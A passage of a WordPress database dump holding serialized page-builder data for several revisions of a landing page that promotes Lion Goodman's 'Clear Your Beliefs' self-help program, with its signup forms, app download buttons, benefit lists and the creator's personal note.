id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1315, 1776, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1181:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -58px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2814:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:511:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><p> </p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1312, 1773, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:1208:"<p>[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]</p><div style="height: auto; width: 100%;"><p><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs <br />– Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -58px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><p><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2814:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
